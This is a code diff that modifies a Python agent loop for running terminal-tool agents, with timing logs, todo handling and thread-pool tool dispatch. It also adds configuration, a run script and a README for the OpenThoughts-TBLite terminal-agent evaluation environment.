Modified in-place as the conversation progresses.
Returns:
AgentResult with full conversation history, managed state, and metadata
@@ -308,21 +176,27 @@ class HermesAgentLoop:
reasoning_per_turn = []
tool_errors: List[ToolError] = []
# Metrics to separate "attempted tool use" from "schema-valid tool use"
tool_calls_attempted = 0
tool_calls_schema_valid = 0
tool_calls_executed_ok = 0
tool_calls_exec_error = 0
# Per-loop TodoStore for the todo tool (ephemeral, dies with the loop)
from tools.todo_tool import TodoStore, todo_tool as _todo_tool
_todo_store = TodoStore()
# Extract user task from first user message for browser_snapshot context
_user_task = None
for msg in messages:
if msg.get("role") == "user":
content = msg.get("content", "")
if isinstance(content, str) and content.strip():
_user_task = content.strip()[:500] # Cap to avoid huge strings
break
import time as _time
for turn in range(self.max_turns):
# Truncate context if approaching limit.
# IMPORTANT: do this on a copy so we keep the full trajectory in `messages`
# for reward computation + debugging, while only trimming the prompt view.
prompt_messages = self._truncate_context(list(messages))
turn_start = _time.monotonic()
# Build the chat_completion kwargs
chat_kwargs = {
"messages": prompt_messages,
"messages": messages,
"n": 1,
"temperature": self.temperature,
}
@@ -335,11 +209,18 @@ class HermesAgentLoop:
if self.max_tokens is not None:
chat_kwargs["max_tokens"] = self.max_tokens
# Inject extra_body for provider-specific params (e.g., OpenRouter
# provider preferences like banned/preferred providers, transforms)
if self.extra_body:
chat_kwargs["extra_body"] = self.extra_body
# Make the API call -- standard OpenAI spec
api_start = _time.monotonic()
try:
response = await self.server.chat_completion(**chat_kwargs)
except Exception as e:
logger.error("API call failed on turn %d: %s", turn + 1, e)
api_elapsed = _time.monotonic() - api_start
logger.error("API call failed on turn %d (%.1fs): %s", turn + 1, api_elapsed, e)
return AgentResult(
messages=messages,
managed_state=self._get_managed_state(),
@@ -347,14 +228,12 @@ class HermesAgentLoop:
finished_naturally=False,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
tool_calls_attempted=tool_calls_attempted,
tool_calls_schema_valid=tool_calls_schema_valid,
tool_calls_executed_ok=tool_calls_executed_ok,
tool_calls_exec_error=tool_calls_exec_error,
)
api_elapsed = _time.monotonic() - api_start
if not response or not response.choices:
logger.warning("Empty response on turn %d", turn + 1)
logger.warning("Empty response on turn %d (api=%.1fs)", turn + 1, api_elapsed)
return AgentResult(
messages=messages,
managed_state=self._get_managed_state(),
@@ -362,10 +241,6 @@ class HermesAgentLoop:
finished_naturally=False,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
tool_calls_attempted=tool_calls_attempted,
tool_calls_schema_valid=tool_calls_schema_valid,
tool_calls_executed_ok=tool_calls_executed_ok,
tool_calls_exec_error=tool_calls_exec_error,
)
assistant_msg = response.choices[0].message
@@ -424,45 +299,66 @@ class HermesAgentLoop:
"Model called unknown tool '%s' on turn %d",
tool_name, turn + 1,
)
tool_calls_exec_error += 1
else:
tool_calls_attempted += 1
# Normalize args into a dict so we never crash due to formatting.
# Track schema_valid separately so reward shaping can penalize
# non-canonical formats (e.g. stringified JSON).
args, schema_valid = self._normalize_tool_args(tool_name, tool_args_raw)
if schema_valid:
tool_calls_schema_valid += 1
# Parse arguments and dispatch
try:
args = json.loads(tool_args_raw)
except json.JSONDecodeError:
args = {}
logger.warning(
"Invalid JSON in tool call arguments for '%s': %s",
tool_name, tool_args_raw[:200],
)
try:
if tool_name == "terminal":
import os
backend = os.getenv("TERMINAL_ENV", "local")
if self.tool_handler:
backend = "sandbox"
cmd_preview = str(args.get("command", ""))[:80]
print(f" 🖥️ [{backend}] $ {cmd_preview}")
if self.tool_handler:
# Use custom tool handler (sandbox backend routing)
tool_result = await self.tool_handler(
tool_name, args, self.task_id
cmd_preview = args.get("command", "")[:80]
logger.info(
"[%s] $ %s", self.task_id[:8], cmd_preview,
)
tool_submit_time = _time.monotonic()
# Todo tool -- handle locally (needs per-loop TodoStore)
if tool_name == "todo":
tool_result = _todo_tool(
todos=args.get("todos"),
merge=args.get("merge", False),
store=_todo_store,
)
tool_elapsed = _time.monotonic() - tool_submit_time
elif tool_name == "memory":
tool_result = json.dumps({"error": "Memory is not available in RL environments."})
tool_elapsed = _time.monotonic() - tool_submit_time
elif tool_name == "session_search":
tool_result = json.dumps({"error": "Session search is not available in RL environments."})
tool_elapsed = _time.monotonic() - tool_submit_time
else:
# Default: run via hermes-agent's handle_function_call
# in a thread pool so backends that use asyncio.run()
# internally (modal, docker) get a clean event loop
# instead of deadlocking inside Atropos's loop.
# Run tool calls in a thread pool so backends that
# use asyncio.run() internally (modal, docker, daytona) get
# a clean event loop instead of deadlocking.
loop = asyncio.get_event_loop()
# Capture current tool_name/args for the lambda
_tn, _ta, _tid = tool_name, args, self.task_id
tool_result = await loop.run_in_executor(
_tool_executor,
lambda: handle_function_call(
tool_name, args, task_id=self.task_id
_tn, _ta, task_id=_tid,
user_task=_user_task,
),
)
tool_elapsed = _time.monotonic() - tool_submit_time
# Log slow tools and thread pool stats for debugging
pool_active = _tool_executor._work_queue.qsize()
if tool_elapsed > 30:
logger.warning(
"[%s] turn %d: %s took %.1fs (pool queue=%d)",
self.task_id[:8], turn + 1, tool_name,
tool_elapsed, pool_active,
)
except Exception as e:
tool_calls_exec_error += 1
tool_result = json.dumps(
{"error": f"Tool execution failed: {type(e).__name__}: {str(e)}"}
)
@@ -476,34 +372,22 @@ class HermesAgentLoop:
"Tool '%s' execution failed on turn %d: %s",
tool_name, turn + 1, e,
)
else:
# Count tool result errors (if tool returns structured JSON error)
tool_err = False
try:
result_data = json.loads(tool_result)
if isinstance(result_data, dict):
err = result_data.get("error")
if err:
tool_err = True
# Keep existing behavior: treat negative exit_code as tool error
exit_code = result_data.get("exit_code")
if exit_code is not None and isinstance(exit_code, int) and exit_code < 0:
tool_err = True
tool_errors.append(ToolError(
turn=turn + 1, tool_name=tool_name,
arguments=tool_args_raw[:200],
error=str(err) if err else "nonzero exit_code",
tool_result=tool_result[:500],
))
except (json.JSONDecodeError, TypeError):
# Non-JSON tool output — assume ok
pass
if tool_err:
tool_calls_exec_error += 1
else:
tool_calls_executed_ok += 1
# Also check if the tool returned an error in its JSON result
try:
result_data = json.loads(tool_result)
if isinstance(result_data, dict):
err = result_data.get("error")
exit_code = result_data.get("exit_code")
if err and exit_code and exit_code < 0:
tool_errors.append(ToolError(
turn=turn + 1, tool_name=tool_name,
arguments=tool_args_raw[:200],
error=str(err),
tool_result=tool_result[:500],
))
except (json.JSONDecodeError, TypeError):
pass
# Add tool response to conversation
messages.append(
@@ -514,10 +398,11 @@ class HermesAgentLoop:
}
)
logger.debug(
"Turn %d: %d tool calls executed",
turn + 1,
len(assistant_msg.tool_calls),
turn_elapsed = _time.monotonic() - turn_start
logger.info(
"[%s] turn %d: api=%.1fs, %d tools, turn_total=%.1fs",
self.task_id[:8], turn + 1, api_elapsed,
len(assistant_msg.tool_calls), turn_elapsed,
)
else:
@@ -530,8 +415,10 @@ class HermesAgentLoop:
msg_dict["reasoning_content"] = reasoning
messages.append(msg_dict)
logger.debug(
"Turn %d: model finished naturally (no tool calls)", turn + 1
turn_elapsed = _time.monotonic() - turn_start
logger.info(
"[%s] turn %d: api=%.1fs, no tools (finished), turn_total=%.1fs",
self.task_id[:8], turn + 1, api_elapsed, turn_elapsed,
)
return AgentResult(
@@ -541,10 +428,6 @@ class HermesAgentLoop:
finished_naturally=True,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
tool_calls_attempted=tool_calls_attempted,
tool_calls_schema_valid=tool_calls_schema_valid,
tool_calls_executed_ok=tool_calls_executed_ok,
tool_calls_exec_error=tool_calls_exec_error,
)
# Hit max turns without the model stopping
@@ -556,10 +439,6 @@ class HermesAgentLoop:
finished_naturally=False,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
tool_calls_attempted=tool_calls_attempted,
tool_calls_schema_valid=tool_calls_schema_valid,
tool_calls_executed_ok=tool_calls_executed_ok,
tool_calls_exec_error=tool_calls_exec_error,
)
def _get_managed_state(self) -> Optional[Dict[str, Any]]:

View File

View File

@@ -0,0 +1,73 @@
# OpenThoughts-TBLite Evaluation Environment
This environment evaluates terminal agents on the [OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite) benchmark, a difficulty-calibrated subset of [Terminal-Bench 2.0](https://www.tbench.ai/leaderboard/terminal-bench/2.0).
## Source
OpenThoughts-TBLite was created by the [OpenThoughts](https://www.openthoughts.ai/) Agent team in collaboration with [Snorkel AI](https://snorkel.ai/) and [Bespoke Labs](https://bespokelabs.ai/). The original dataset and documentation live at:
- **Dataset (source):** [open-thoughts/OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite)
- **GitHub:** [open-thoughts/OpenThoughts-TBLite](https://github.com/open-thoughts/OpenThoughts-TBLite)
- **Blog post:** [openthoughts.ai/blog/openthoughts-tblite](https://www.openthoughts.ai/blog/openthoughts-tblite)
## Our Dataset
We converted the source into the same schema used by our Terminal-Bench 2.0 environment (pre-built Docker Hub images, base64-encoded test tarballs, etc.) and published it as:
- **Dataset (ours):** [NousResearch/openthoughts-tblite](https://huggingface.co/datasets/NousResearch/openthoughts-tblite)
- **Docker images:** `nousresearch/tblite-<task-name>:latest` on Docker Hub (100 images)
The conversion script is at `scripts/prepare_tblite_dataset.py`.
## Why TBLite?
Terminal-Bench 2.0 is one of the strongest frontier evaluations for terminal agents, but when a model scores near the floor (e.g., Qwen 3 8B at <1%), many changes look identical in aggregate score. TBLite addresses this by calibrating task difficulty using Claude Haiku 4.5 as a reference:
| Difficulty | Pass Rate Range | Tasks |
|------------|----------------|-------|
| Easy | >= 70% | 40 |
| Medium | 40-69% | 26 |
| Hard | 10-39% | 26 |
| Extreme | < 10% | 8 |
This gives enough solvable tasks to detect small improvements quickly, while preserving enough hard tasks to avoid saturation. The correlation between TBLite and TB2 scores is **r = 0.911**.
TBLite also runs 2.6-8x faster than the full TB2, making it practical for iteration loops.
## Usage
```bash
# Run the full benchmark
python environments/benchmarks/tblite/tblite_env.py evaluate
# Filter to specific tasks
python environments/benchmarks/tblite/tblite_env.py evaluate \
--env.task_filter "broken-python,pandas-etl"
# Use a different model
python environments/benchmarks/tblite/tblite_env.py evaluate \
--server.model_name "qwen/qwen3-30b"
```
## Architecture
`TBLiteEvalEnv` is a thin subclass of `TerminalBench2EvalEnv`. All evaluation logic (agent loop, Docker sandbox management, test verification, metrics) is inherited. Only the defaults differ:
| Setting | TB2 | TBLite |
|----------------|----------------------------------|-----------------------------------------|
| Dataset | `NousResearch/terminal-bench-2` | `NousResearch/openthoughts-tblite` |
| Tasks | 89 | 100 |
| Task timeout | 1800s (30 min) | 1200s (20 min) |
| Wandb name | `terminal-bench-2` | `openthoughts-tblite` |
## Citation
```bibtex
@software{OpenThoughts-TBLite,
author = {OpenThoughts-Agent team, Snorkel AI, Bespoke Labs},
month = Feb,
title = {{OpenThoughts-TBLite: A High-Signal Benchmark for Iterating on Terminal Agents}},
howpublished = {https://www.openthoughts.ai/blog/openthoughts-tblite},
year = {2026}
}
```

View File

@@ -0,0 +1,39 @@
# OpenThoughts-TBLite Evaluation -- Default Configuration
#
# Eval-only environment for the TBLite benchmark (100 difficulty-calibrated
# terminal tasks, a faster proxy for Terminal-Bench 2.0).
# Uses Modal terminal backend for per-task cloud-isolated sandboxes
# and OpenRouter for inference.
#
# Usage:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/default.yaml
#
# # Override model:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/default.yaml \
# --openai.model_name anthropic/claude-sonnet-4
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 60
max_token_length: 32000
agent_temperature: 0.8
terminal_backend: "modal"
terminal_timeout: 300 # 5 min per command (builds, pip install)
tool_pool_size: 128 # thread pool for 100 parallel tasks
dataset_name: "NousResearch/openthoughts-tblite"
test_timeout: 600
task_timeout: 1200 # 20 min wall-clock per task (TBLite tasks are faster)
tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
use_wandb: true
wandb_name: "openthoughts-tblite"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite"
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-opus-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env

View File

@@ -0,0 +1,42 @@
#!/bin/bash
# OpenThoughts-TBLite Evaluation
#
# Run from repo root:
# bash environments/benchmarks/tblite/run_eval.sh
#
# Override model:
# bash environments/benchmarks/tblite/run_eval.sh \
# --openai.model_name anthropic/claude-sonnet-4
#
# Run a subset:
# bash environments/benchmarks/tblite/run_eval.sh \
# --env.task_filter broken-python,pandas-etl
#
# All terminal settings (backend, timeout, lifetime, pool size) are
# configured via env config fields -- no env vars needed.
set -euo pipefail
mkdir -p logs evals/openthoughts-tblite
LOG_FILE="logs/tblite_$(date +%Y%m%d_%H%M%S).log"
echo "OpenThoughts-TBLite Evaluation"
echo "Log file: $LOG_FILE"
echo ""
# Unbuffered python output so logs are written in real-time
export PYTHONUNBUFFERED=1
# Show INFO-level agent loop timing (api/tool durations per turn)
# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
export LOGLEVEL=INFO
python tblite_env.py evaluate \
--config default.yaml \
"$@" \
2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"
echo "Eval results: evals/openthoughts-tblite/"

View File

@@ -0,0 +1,119 @@
"""
OpenThoughts-TBLite Evaluation Environment
A lighter, faster alternative to Terminal-Bench 2.0 for iterating on terminal
agents. Uses the same evaluation logic as TerminalBench2EvalEnv but defaults
to the NousResearch/openthoughts-tblite dataset (100 difficulty-calibrated
tasks vs TB2's 89 harder tasks).
TBLite tasks are a curated subset of TB2 with a difficulty distribution
designed to give meaningful signal even for smaller models:
- Easy (40 tasks): >= 70% pass rate with Claude Haiku 4.5
- Medium (26 tasks): 40-69% pass rate
- Hard (26 tasks): 10-39% pass rate
- Extreme (8 tasks): < 10% pass rate
Usage:
python environments/benchmarks/tblite/tblite_env.py evaluate
# Filter to specific tasks:
python environments/benchmarks/tblite/tblite_env.py evaluate \\
--env.task_filter "broken-python,pandas-etl"
"""
import os
import sys
from pathlib import Path
from typing import List, Tuple
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.benchmarks.terminalbench_2.terminalbench2_env import (
TerminalBench2EvalConfig,
TerminalBench2EvalEnv,
)
class TBLiteEvalConfig(TerminalBench2EvalConfig):
"""Configuration for the OpenThoughts-TBLite evaluation environment.
Inherits all TB2 config fields. Only the dataset default and task timeout
differ -- TBLite tasks are calibrated to be faster.
"""
dataset_name: str = Field(
default="NousResearch/openthoughts-tblite",
description="HuggingFace dataset containing TBLite tasks.",
)
task_timeout: int = Field(
default=1200,
description="Maximum wall-clock seconds per task. TBLite tasks are "
"generally faster than TB2, so 20 minutes is usually sufficient.",
)
class TBLiteEvalEnv(TerminalBench2EvalEnv):
"""OpenThoughts-TBLite evaluation environment.
Inherits all evaluation logic from TerminalBench2EvalEnv (agent loop,
test verification, Docker image resolution, metrics, wandb logging).
Only the default configuration differs.
"""
name = "openthoughts-tblite"
env_config_cls = TBLiteEvalConfig
@classmethod
def config_init(cls) -> Tuple[TBLiteEvalConfig, List[APIServerConfig]]:
env_config = TBLiteEvalConfig(
enabled_toolsets=["terminal", "file"],
disabled_toolsets=None,
distribution=None,
max_agent_turns=60,
max_token_length=16000,
agent_temperature=0.6,
system_prompt=None,
terminal_backend="modal",
terminal_timeout=300,
test_timeout=180,
# 100 tasks in parallel
tool_pool_size=128,
eval_handling=EvalHandlingEnum.STOP_TRAIN,
group_size=1,
steps_per_eval=1,
total_steps=1,
tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
use_wandb=True,
wandb_name="openthoughts-tblite",
ensure_scores_are_not_same=False,
)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
if __name__ == "__main__":
TBLiteEvalEnv.cli()

Some files were not shown because too many files have changed in this diff Show More